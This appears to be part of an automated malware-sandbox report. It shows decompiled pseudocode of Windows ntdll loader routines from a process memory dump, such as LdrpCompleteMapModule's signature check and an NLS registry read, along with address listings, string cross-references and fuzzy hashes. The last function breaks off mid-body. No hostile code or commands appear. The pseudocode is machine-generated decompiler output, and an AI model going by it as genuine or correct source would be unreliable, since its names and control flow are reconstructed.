                                                                      0x01379c02
                                                                      0x01379c08
                                                                      0x01379c0d
                                                                      0x01379c0f
                                                                      0x01379c14
                                                                      0x01379c2d
                                                                      0x01379c32
                                                                      0x01379c37
                                                                      0x01379c3a
                                                                      0x01379c3c
                                                                      0x01379c42
                                                                      0x01379c42
                                                                      0x01379c3c
                                                                      0x01379c02
                                                                      0x013287da
                                                                      0x013287df
                                                                      0x013287e3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013287e3
                                                                      0x013287f2
                                                                      0x00000000
                                                                      0x013287fb
                                                                      0x013287fd
                                                                      0x013287fe
                                                                      0x0132880e
                                                                      0x0132880f
                                                                      0x01328810
                                                                      0x01328814
                                                                      0x0132881a
                                                                      0x0132881c
                                                                      0x0132881f
                                                                      0x01328821
                                                                      0x01328822
                                                                      0x01328824
                                                                      0x01328826
                                                                      0x0132882c
                                                                      0x0132882e
                                                                      0x01379c48
                                                                      0x01379c48
                                                                      0x01328834
                                                                      0x01328834
                                                                      0x01328837
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01328837
                                                                      0x0132882e
                                                                      0x0132883d
                                                                      0x01328840
                                                                      0x01328843
                                                                      0x01328846
                                                                      0x01328849
                                                                      0x0132884c
                                                                      0x0132884e
                                                                      0x01328850
                                                                      0x01328852
                                                                      0x01328854
                                                                      0x01328857
                                                                      0x013288b4
                                                                      0x013288b6
                                                                      0x013288b6
                                                                      0x01328859
                                                                      0x01328859
                                                                      0x01328859
                                                                      0x01328861
                                                                      0x01328866
                                                                      0x0132886a
                                                                      0x0132893d
                                                                      0x01328941
                                                                      0x00000000
                                                                      0x01328947
                                                                      0x01328947
                                                                      0x0132894a
                                                                      0x0132894c
                                                                      0x00000000
                                                                      0x01328952
                                                                      0x01328955
                                                                      0x0132895a
                                                                      0x0132895d
                                                                      0x0132895d
                                                                      0x0132895f
                                                                      0x01328961
                                                                      0x01328961
                                                                      0x01328968
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0132896a
                                                                      0x0132896b
                                                                      0x0132896e
                                                                      0x00000000
                                                                      0x01328970
                                                                      0x01328970
                                                                      0x01328970
                                                                      0x01328970
                                                                      0x01328972
                                                                      0x01328972
                                                                      0x01328974
                                                                      0x00000000
                                                                      0x0132897a
                                                                      0x0132897a
                                                                      0x0132897d
                                                                      0x00000000
                                                                      0x01328983
                                                                      0x01379c65
                                                                      0x01379c6d
                                                                      0x01379c72
                                                                      0x01379c75
                                                                      0x01379c75
                                                                      0x01379c82
                                                                      0x01379c86
                                                                      0x01379c87
                                                                      0x01379c88
                                                                      0x01379c89
                                                                      0x01379c8c
                                                                      0x01379c90
                                                                      0x01379c95
                                                                      0x01379c97
                                                                      0x01379ca0
                                                                      0x01379ca3
                                                                      0x01379ca9
                                                                      0x01379ca9
                                                                      0x00000000
                                                                      0x01379ca9
                                                                      0x01379ca3
                                                                      0x00000000
                                                                      0x01379c97
                                                                      0x0132897d
                                                                      0x00000000
                                                                      0x01328974
                                                                      0x01328988
                                                                      0x01328992
                                                                      0x01328996
                                                                      0x00000000
                                                                      0x01328996
                                                                      0x0132894c
                                                                      0x00000000
                                                                      0x01328870
                                                                      0x0132887b
                                                                      0x0132887d
                                                                      0x0132887f
                                                                      0x01328881
                                                                      0x01328884
                                                                      0x01328884
                                                                      0x01328886
                                                                      0x01328889
                                                                      0x0132888c
                                                                      0x0132888e
                                                                      0x01328891
                                                                      0x01328891
                                                                      0x01328898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0132889a
                                                                      0x0132889b
                                                                      0x0132889e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013288a0
                                                                      0x013288a8
                                                                      0x013288b0
                                                                      0x013288b2
                                                                      0x013288d3
                                                                      0x013288d5
                                                                      0x00000000
                                                                      0x013288d7
                                                                      0x013288db
                                                                      0x013288dc
                                                                      0x013288e0
                                                                      0x013288e8
                                                                      0x013288ee
                                                                      0x013288f0
                                                                      0x013288f3
                                                                      0x013288fc
                                                                      0x01328901
                                                                      0x01328906
                                                                      0x0132890c
                                                                      0x0132890c
                                                                      0x0132890f
                                                                      0x01328916
                                                                      0x01328917
                                                                      0x01328918
                                                                      0x01328919
                                                                      0x0132891a
                                                                      0x0132891f
                                                                      0x01328921
                                                                      0x01379c52
                                                                      0x01379c55
                                                                      0x01379c5b
                                                                      0x01379cac
                                                                      0x01379cc0
                                                                      0x01379cc0
                                                                      0x01379c55
                                                                      0x01328927
                                                                      0x01328927
                                                                      0x0132892f
                                                                      0x01328933
                                                                      0x00000000
                                                                      0x013288f5
                                                                      0x013288f5
                                                                      0x00000000
                                                                      0x013288f7
                                                                      0x013288f7
                                                                      0x013288fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013288fa
                                                                      0x013288f5
                                                                      0x013288f3
                                                                      0x00000000
                                                                      0x013288d5
                                                                      0x00000000
                                                                      0x013288b2
                                                                      0x013288c9
                                                                      0x00000000
                                                                      0x013288c9
                                                                      0x0132887f
                                                                      0x0132886a
                                                                      0x01328857
                                                                      0x01328852
                                                                      0x013288bf
                                                                      0x013288bf
                                                                      0x013287aa
                                                                      0x013287ad
                                                                      0x013287ae
                                                                      0x013287b4
                                                                      0x013287b5
                                                                      0x013287b6
                                                                      0x013287b8
                                                                      0x013287bd
                                                                      0x013287c1
                                                                      0x013287f4
                                                                      0x013287fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013287c1
                                                                      0x00000000

                                                                      Strings
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01379C28
                                                                      • LdrpDoPostSnapWork, xrefs: 01379C1E
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01379C18
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 1a146ae8dbb9bcca680c1bfabac9874945288ba00e44200fab7de424f6544f1f
                                                                      • Instruction ID: 20e17246fa58c5cbc8be31fe209b0336de1a238d26de2740724703b1f71d588d
                                                                      • Opcode Fuzzy Hash: 1a146ae8dbb9bcca680c1bfabac9874945288ba00e44200fab7de424f6544f1f
                                                                      • Instruction Fuzzy Hash: 9C912431A0022ADFEF29EF5DC880ABABBF5FF5431CB0541A9D905AB250D770E901CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E01327E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				char _v24;
                                                                      				signed int _t73;
                                                                      				void* _t77;
                                                                      				char* _t82;
                                                                      				char* _t87;
                                                                      				signed char* _t97;
                                                                      				signed char _t102;
                                                                      				intOrPtr _t107;
                                                                      				signed char* _t108;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t124;
                                                                      				intOrPtr _t125;
                                                                      				intOrPtr _t126;
                                                                      
                                                                      				_t107 = __edx;
                                                                      				_v12 = __ecx;
                                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                      				_t124 = 0;
                                                                      				_v20 = __edx;
                                                                      				if(E0132CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                      					_t112 = _v8;
                                                                      				} else {
                                                                      					_t112 = 0;
                                                                      					_v8 = 0;
                                                                      				}
                                                                      				if(_t112 != 0) {
                                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                      						_t124 = 0xc000007b;
                                                                      						goto L8;
                                                                      					}
                                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                      					 *(_t125 + 0x34) = _t73;
                                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                      					_t124 = E0131C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                      					if(_t124 < 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      				} else {
                                                                      					L3:
                                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                      						L8:
                                                                      						return _t124;
                                                                      					}
                                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                      							goto L5;
                                                                      						}
                                                                      						_t102 =  *0x1405780; // 0x0
                                                                      						if((_t102 & 0x00000003) != 0) {
                                                                      							E01395510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                      							_t102 =  *0x1405780; // 0x0
                                                                      						}
                                                                      						if((_t102 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      						_t124 = 0xc0000428;
                                                                      						goto L8;
                                                                      					}
                                                                      					L5:
                                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      					_t77 = _a4 - 0x40000003;
                                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      						if(E01337D50() != 0) {
                                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      						} else {
                                                                      							_t82 = 0x7ffe0384;
                                                                      						}
                                                                      						_t108 = 0x7ffe0385;
                                                                      						if( *_t82 != 0) {
                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E01337D50() == 0) {
                                                                      									_t97 = 0x7ffe0385;
                                                                      								} else {
                                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                                      									E01397016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a4 != 0x40000003) {
                                                                      							L14:
                                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      							if(E01337D50() != 0) {
                                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      							} else {
                                                                      								_t87 = 0x7ffe0384;
                                                                      							}
                                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E01337D50() != 0) {
                                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                                      									E01397016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_v16 = _t125 + 0x24;
                                                                      							_t124 = E0134A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                      							if(_t124 < 0) {
                                                                      								E0131B1E1(_t124, 0x1490, 0, _v16);
                                                                      								goto L8;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}




















                                                                      0x01327e4c
                                                                      0x01327e50
                                                                      0x01327e55
                                                                      0x01327e58
                                                                      0x01327e5d
                                                                      0x01327e71
                                                                      0x01327f33
                                                                      0x01327e77
                                                                      0x01327e77
                                                                      0x01327e79
                                                                      0x01327e79
                                                                      0x01327e7e
                                                                      0x01327f45
                                                                      0x01379848
                                                                      0x00000000
                                                                      0x01379848
                                                                      0x01327f4e
                                                                      0x01327f53
                                                                      0x01327f5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0137985a
                                                                      0x01379862
                                                                      0x01379866
                                                                      0x00000000
                                                                      0x0137986c
                                                                      0x00000000
                                                                      0x0137986c
                                                                      0x01327e84
                                                                      0x01327e84
                                                                      0x01327e8d
                                                                      0x01379871
                                                                      0x01327eb8
                                                                      0x01327ec0
                                                                      0x01327ec0
                                                                      0x01327e9a
                                                                      0x0137987e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01379884
                                                                      0x0137988b
                                                                      0x013798a7
                                                                      0x013798ac
                                                                      0x013798b1
                                                                      0x013798b6
                                                                      0x013798b8
                                                                      0x013798b8
                                                                      0x013798b9
                                                                      0x00000000
                                                                      0x013798b9
                                                                      0x01327ea0
                                                                      0x01327ea7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01327eac
                                                                      0x01327eb1
                                                                      0x01327ec6
                                                                      0x01327ed0
                                                                      0x013798cc
                                                                      0x01327ed6
                                                                      0x01327ed6
                                                                      0x01327ed6
                                                                      0x01327ede
                                                                      0x01327ee3
                                                                      0x013798e3
                                                                      0x013798f0
                                                                      0x01379902
                                                                      0x013798f2
                                                                      0x013798fb
                                                                      0x013798fb
                                                                      0x01379907
                                                                      0x0137991d
                                                                      0x0137991d
                                                                      0x01379907
                                                                      0x013798e3
                                                                      0x01327ef0
                                                                      0x01327f14
                                                                      0x01327f14
                                                                      0x01327f1e
                                                                      0x01379946
                                                                      0x01327f24
                                                                      0x01327f24
                                                                      0x01327f24
                                                                      0x01327f2c
                                                                      0x0137996a
                                                                      0x01379975
                                                                      0x01379975
                                                                      0x0137997e
                                                                      0x01379993
                                                                      0x01379993
                                                                      0x0137997e
                                                                      0x00000000
                                                                      0x01327ef2
                                                                      0x01327efc
                                                                      0x01327f0a
                                                                      0x01327f0e
                                                                      0x01379933
                                                                      0x00000000
                                                                      0x01379933
                                                                      0x00000000
                                                                      0x01327f0e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01327eb1

                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 013798A2
                                                                      • LdrpCompleteMapModule, xrefs: 01379898
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01379891
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: b30577a51676164ac43701f87eb5c8e8db999c17e6b11b14a244e49005a94a89
                                                                      • Instruction ID: fa245bd308d227fa5b0a430042856dfd17466ffa61c0e83b777755f9081d38e3
                                                                      • Opcode Fuzzy Hash: b30577a51676164ac43701f87eb5c8e8db999c17e6b11b14a244e49005a94a89
                                                                      • Instruction Fuzzy Hash: C251013160474ADBEB22DB5CC948B2A7BE4FB1132CF040669E9559B7E1D734ED00CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0131E620(void* __ecx, short* __edx, short* _a4) {
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				char* _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				char _v64;
                                                                      				void* _v68;
                                                                      				void* _v76;
                                                                      				void* _v84;
                                                                      				signed int _t59;
                                                                      				signed int _t74;
                                                                      				signed short* _t75;
                                                                      				signed int _t76;
                                                                      				signed short* _t78;
                                                                      				signed int _t83;
                                                                      				short* _t93;
                                                                      				signed short* _t94;
                                                                      				short* _t96;
                                                                      				void* _t97;
                                                                      				signed int _t99;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      
                                                                      				_t80 = __ecx;
                                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                      				_t96 = __edx;
                                                                      				_v44 = __edx;
                                                                      				_t78 = 0;
                                                                      				_v56 = 0;
                                                                      				if(__ecx == 0 || __edx == 0) {
                                                                      					L28:
                                                                      					_t97 = 0xc000000d;
                                                                      				} else {
                                                                      					_t93 = _a4;
                                                                      					if(_t93 == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					_t78 = E0131F358(__ecx, 0xac);
                                                                      					if(_t78 == 0) {
                                                                      						_t97 = 0xc0000017;
                                                                      						L6:
                                                                      						if(_v56 != 0) {
                                                                      							_push(_v56);
                                                                      							E013595D0();
                                                                      						}
                                                                      						if(_t78 != 0) {
                                                                      							L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                      						}
                                                                      						return _t97;
                                                                      					}
                                                                      					E0135FA60(_t78, 0, 0x158);
                                                                      					_v48 = _v48 & 0x00000000;
                                                                      					_t102 = _t101 + 0xc;
                                                                      					 *_t96 = 0;
                                                                      					 *_t93 = 0;
                                                                      					E0135BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                      					_v36 = 0x18;
                                                                      					_v28 =  &_v44;
                                                                      					_v64 = 0;
                                                                      					_push( &_v36);
                                                                      					_push(0x20019);
                                                                      					_v32 = 0;
                                                                      					_push( &_v64);
                                                                      					_v24 = 0x40;
                                                                      					_v20 = 0;
                                                                      					_v16 = 0;
                                                                      					_t97 = E01359600();
                                                                      					if(_t97 < 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					E0135BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                      					_push(0);
                                                                      					_v48 = 4;
                                                                      					_t97 = L0131F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                      					if(_t97 >= 0) {
                                                                      						if(_v52 != 1) {
                                                                      							L17:
                                                                      							_t97 = 0xc0000001;
                                                                      							goto L6;
                                                                      						}
                                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                                      						_t94 = _t78;
                                                                      						_t83 = _t59;
                                                                      						if(_t59 == 0) {
                                                                      							L19:
                                                                      							if(_t83 == 0) {
                                                                      								L23:
                                                                      								E0135BB40(_t83, _t102 + 0x24, _t78);
                                                                      								if(L013243C0( &_v48,  &_v64) == 0) {
                                                                      									goto L17;
                                                                      								}
                                                                      								_t84 = _v48;
                                                                      								 *_v48 = _v56;
                                                                      								if( *_t94 != 0) {
                                                                      									E0135BB40(_t84, _t102 + 0x24, _t94);
                                                                      									if(L013243C0( &_v48,  &_v64) != 0) {
                                                                      										 *_a4 = _v56;
                                                                      									} else {
                                                                      										_t97 = 0xc0000001;
                                                                      										 *_v48 = 0;
                                                                      									}
                                                                      								}
                                                                      								goto L6;
                                                                      							}
                                                                      							_t83 = _t83 & 0x0000ffff;
                                                                      							while(_t83 == 0x20) {
                                                                      								_t94 =  &(_t94[1]);
                                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                                      								_t83 = _t74;
                                                                      								if(_t74 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L23;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      						while(1) {
                                                                      							L14:
                                                                      							_t27 =  &(_t94[1]); // 0x2
                                                                      							_t75 = _t27;
                                                                      							if(_t83 == 0x2c) {
                                                                      								break;
                                                                      							}
                                                                      							_t94 = _t75;
                                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                                      							_t83 = _t76;
                                                                      							if(_t76 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						 *_t94 = 0;
                                                                      						_t94 = _t75;
                                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}































                                                                      0x0131e620
                                                                      0x0131e628
                                                                      0x0131e62f
                                                                      0x0131e631
                                                                      0x0131e635
                                                                      0x0131e637
                                                                      0x0131e63e
                                                                      0x01375503
                                                                      0x01375503
                                                                      0x0131e64c
                                                                      0x0131e64c
                                                                      0x0131e651
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0131e661
                                                                      0x0131e665
                                                                      0x0137542a
                                                                      0x0131e715
                                                                      0x0131e71a
                                                                      0x0131e71c
                                                                      0x0131e720
                                                                      0x0131e720
                                                                      0x0131e727
                                                                      0x0131e736
                                                                      0x0131e736
                                                                      0x0131e743
                                                                      0x0131e743
                                                                      0x0131e673
                                                                      0x0131e678
                                                                      0x0131e67d
                                                                      0x0131e682
                                                                      0x0131e685
                                                                      0x0131e692
                                                                      0x0131e69b
                                                                      0x0131e6a3
                                                                      0x0131e6ad
                                                                      0x0131e6b1
                                                                      0x0131e6b2
                                                                      0x0131e6bb
                                                                      0x0131e6bf
                                                                      0x0131e6c0
                                                                      0x0131e6c8
                                                                      0x0131e6cc
                                                                      0x0131e6d5
                                                                      0x0131e6d9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0131e6e5
                                                                      0x0131e6ea
                                                                      0x0131e6f9
                                                                      0x0131e70b
                                                                      0x0131e70f
                                                                      0x01375439
                                                                      0x0137545e
                                                                      0x0137545e
                                                                      0x00000000
                                                                      0x0137545e
                                                                      0x0137543b
                                                                      0x0137543e
                                                                      0x01375440
                                                                      0x01375445
                                                                      0x01375472
                                                                      0x01375475
                                                                      0x0137548d
                                                                      0x01375493
                                                                      0x013754a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013754ab
                                                                      0x013754b4
                                                                      0x013754bc
                                                                      0x013754c8
                                                                      0x013754de
                                                                      0x013754fb
                                                                      0x013754e0
                                                                      0x013754e6
                                                                      0x013754eb
                                                                      0x013754eb
                                                                      0x013754de
                                                                      0x00000000
                                                                      0x013754bc
                                                                      0x01375477
                                                                      0x0137547a
                                                                      0x01375480
                                                                      0x01375483
                                                                      0x01375486
                                                                      0x0137548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0137548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01375447
                                                                      0x01375447
                                                                      0x01375447
                                                                      0x01375447
                                                                      0x0137544e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01375450
                                                                      0x01375452
                                                                      0x01375455
                                                                      0x0137545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0137545c
                                                                      0x0137546a
                                                                      0x0137546d
                                                                      0x0137546f
                                                                      0x00000000
                                                                      0x0137546f
                                                                      0x0131e70f

                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0131E68C
                                                                      • @, xrefs: 0131E6C0
                                                                      • InstallLanguageFallback, xrefs: 0131E6DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: c61199efec9d61d85edf8e8e2218b15619cffc784e8d7dd96ba90addc7477e9f
                                                                      • Instruction ID: 2cff3051d1834241ebd443f3c132109e0983905fff527f9cc1e9cd133f1e7fa1
                                                                      • Opcode Fuzzy Hash: c61199efec9d61d85edf8e8e2218b15619cffc784e8d7dd96ba90addc7477e9f
                                                                      • Instruction Fuzzy Hash: 6251B4766083469BD729DF68C440A7BB7E8BF8861CF05092EF985E7240FB75D904C7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E013951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed short* _t63;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t67;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t84;
                                                                      				intOrPtr _t88;
                                                                      				intOrPtr _t94;
                                                                      				void* _t100;
                                                                      				void* _t103;
                                                                      				intOrPtr _t105;
                                                                      				signed int _t106;
                                                                      				short* _t108;
                                                                      				signed int _t110;
                                                                      				signed int _t113;
                                                                      				signed int* _t115;
                                                                      				signed short* _t117;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      
                                                                      				_push(0x80);
                                                                      				_push(0x13f05f0);
                                                                      				E0136D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                      				_t115 =  *(_t118 + 0xc);
                                                                      				 *(_t118 - 0x7c) = _t115;
                                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      				_t113 = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                      				_t100 = __ecx;
                                                                      				if(_t100 == 0) {
                                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                      					E0132EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                                      					_t63 =  *(_t118 - 0x90);
                                                                      					_t101 = _t63[2];
                                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					L20:
                                                                      					_t65 = _t64 >> 1;
                                                                      					L21:
                                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                      					if(_t108 == 0) {
                                                                      						L27:
                                                                      						 *_t115 = _t65 + 1;
                                                                      						_t67 = 0xc0000023;
                                                                      						L28:
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                      						L29:
                                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                      						E013953CA(0);
                                                                      						return E0136D130(0, _t113, _t115);
                                                                      					}
                                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                      							 *_t108 = 0;
                                                                      						}
                                                                      						goto L27;
                                                                      					}
                                                                      					 *_t115 = _t65;
                                                                      					_t115 = _t65 + _t65;
                                                                      					E0135F3E0(_t108, _t101, _t115);
                                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                      					_t67 = 0;
                                                                      					goto L28;
                                                                      				}
                                                                      				_t103 = _t100 - 1;
                                                                      				if(_t103 == 0) {
                                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                      					_t74 = E01333690(1, _t117, 0x12f1810, _t118 - 0x74);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                      					_t101 = _t117[2];
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					if(_t74 < 0) {
                                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                                      						_t115 =  *(_t118 - 0x7c);
                                                                      						goto L20;
                                                                      					}
                                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                      					_t115 =  *(_t118 - 0x7c);
                                                                      					goto L21;
                                                                      				}
                                                                      				if(_t103 == 1) {
                                                                      					_t105 = 4;
                                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                      					_push(_t118 - 0x70);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(_t105);
                                                                      					_push(_t118 - 0x78);
                                                                      					_push(0x6b);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E0135AA90();
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      					_t113 = L01334620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                      					if(_t113 != 0) {
                                                                      						_push(_t118 - 0x70);
                                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                      						_push(_t113);
                                                                      						_push(4);
                                                                      						_push(_t118 - 0x78);
                                                                      						_push(0x6b);
                                                                      						_t84 = E0135AA90();
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                      						if(_t84 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t110 = 0;
                                                                      						_t106 = 0;
                                                                      						while(1) {
                                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                      							 *(_t118 - 0x88) = _t106;
                                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                      								break;
                                                                      							}
                                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                      							_t106 = _t106 + 1;
                                                                      						}
                                                                      						_t88 = E0139500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                      						_t119 = _t119 + 0x1c;
